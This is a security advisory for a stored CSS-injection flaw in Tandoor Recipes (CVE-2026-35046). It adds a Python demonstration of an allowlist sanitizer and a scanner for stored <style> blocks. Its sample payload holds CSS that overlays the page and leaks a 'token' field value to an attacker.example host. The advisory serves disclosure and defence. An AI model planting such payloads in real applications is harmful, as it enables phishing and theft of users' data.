PT-2026-30685 · Unknown · Tandoor Recipes

Filipegaudard · Published 2026-04-06 · Updated 2026-04-06 · CVE-2026-35046

CVSS v3.1: 5.4 (Medium)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Tandoor Recipes versions prior to 2.6.4
Description: Tandoor Recipes allows authenticated users to inject arbitrary `<style>` tags into recipe step instructions. The bleach.clean() sanitizer explicitly allowlists the `<style>` tag, so a CSS payload passes sanitization untouched, is persisted, and is served back via the API. The API itself only stores and returns the payload; the impact lands in whichever client consumes the instructions markdown and renders it as HTML without additional sanitization, where the attacker-controlled CSS is applied. This enables UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration (for example, attribute-selector rules that trigger outbound requests keyed on the value of a form field).
Recommendations: Update to version 2.6.4 or later. Because the payload is stored, also review step instructions saved before the upgrade for `<style>` blocks, since the advisory does not state that existing rows are rewritten.
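The following is an added example, not Tandoor's code and not bleach itself: a small stdlib-only tag-allowlist sanitizer that stands in for the bleach.clean() behaviour the advisory describes. It shows why `<style>` in the allowlist defeats tag-based sanitization (the tag is kept, so its raw text content, which a browser treats as CSS, survives verbatim), what the same input looks like once `style` is removed from the allowlist, and a check that scans already-stored step instructions for `<style>` blocks. The allowlist contents, the `attacker.example` host and the `token` input name are assumptions chosen for illustration.

```python
"""Stand-in for a tag-allowlist sanitizer (constructed example, not Tandoor's
or bleach's code). Demonstrates the CVE-2026-35046 failure mode: allowlisting
<style> lets raw CSS through, because sanitizers only police tags, not the
text inside a raw-text element such as <style> or <script>."""
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlists. The advisory only says <style> was explicitly allowed
# before 2.6.4; the other entries are typical for recipe formatting.
VULNERABLE_ALLOWED_TAGS = {"p", "br", "strong", "em", "ul", "ol", "li", "a", "style"}
HARDENED_ALLOWED_TAGS = VULNERABLE_ALLOWED_TAGS - {"style"}

# Elements whose content is not markup: if the tag is dropped, its text must
# go with it, otherwise the CSS/JS would leak out as visible text.
RAW_TEXT_TAGS = {"style", "script"}


class AllowlistSanitizer(HTMLParser):
    """Keep allowlisted tags (attributes dropped), escape text, and remove
    disallowed tags. Text inside an allowlisted raw-text tag is emitted as-is,
    which is exactly what makes allowlisting <style> dangerous."""

    def __init__(self, allowed):
        super().__init__(convert_charrefs=True)
        self.allowed = allowed
        self.out = []
        self.skip_depth = 0        # inside a dropped <style>/<script>
        self.in_allowed_raw = False  # inside a kept <style>/<script>

    def handle_starttag(self, tag, attrs):
        if tag in self.allowed:
            self.out.append(f"<{tag}>")
            if tag in RAW_TEXT_TAGS:
                self.in_allowed_raw = True
        elif tag in RAW_TEXT_TAGS:
            self.skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.allowed:
            self.out.append(f"</{tag}>")
            if tag in RAW_TEXT_TAGS:
                self.in_allowed_raw = False
        elif tag in RAW_TEXT_TAGS and self.skip_depth:
            self.skip_depth -= 1

    def handle_data(self, data):
        if self.skip_depth:
            return                      # content of a dropped <style>
        if self.in_allowed_raw:
            self.out.append(data)       # CSS passes through verbatim
        else:
            self.out.append(escape(data, quote=False))


def sanitize(html, allowed):
    """Run the allowlist sanitizer over one step instruction."""
    parser = AllowlistSanitizer(allowed)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed attacker-saved step instruction. The CSS repaints the page with a
# remote overlay and leaks the first character of a hypothetical input named
# "token" through a background-image request (classic CSS exfiltration).
PAYLOAD = (
    "Whisk the eggs."
    "<style>"
    "body{background:#fff url(https://attacker.example/overlay.png)}"
    "input[name=token][value^=a]{background:url(https://attacker.example/leak?p=a)}"
    "</style>"
)

# Audit helper for data saved before the fix: returns the CSS body of every
# <style> block found in a stored instruction string.
STYLE_BLOCK_RE = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.IGNORECASE | re.DOTALL)


def find_style_payloads(instruction_markdown):
    return [m.group(1).strip() for m in STYLE_BLOCK_RE.finditer(instruction_markdown)]


if __name__ == "__main__":
    print("vulnerable:", sanitize(PAYLOAD, VULNERABLE_ALLOWED_TAGS))
    print("hardened:  ", sanitize(PAYLOAD, HARDENED_ALLOWED_TAGS))
    print("stored payloads:", find_style_payloads(PAYLOAD))
```

With `style` allowlisted the output still carries the full `<style>` block and both `attacker.example` URLs; with the hardened allowlist the instruction collapses to `Whisk the eggs.`. Run `find_style_payloads` over the `instruction` field of steps returned by the API to locate payloads persisted before the upgrade.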

XSS

Weakness Enumeration

Related Identifiers: CVE-2026-35046

Affected Products: Tandoor Recipes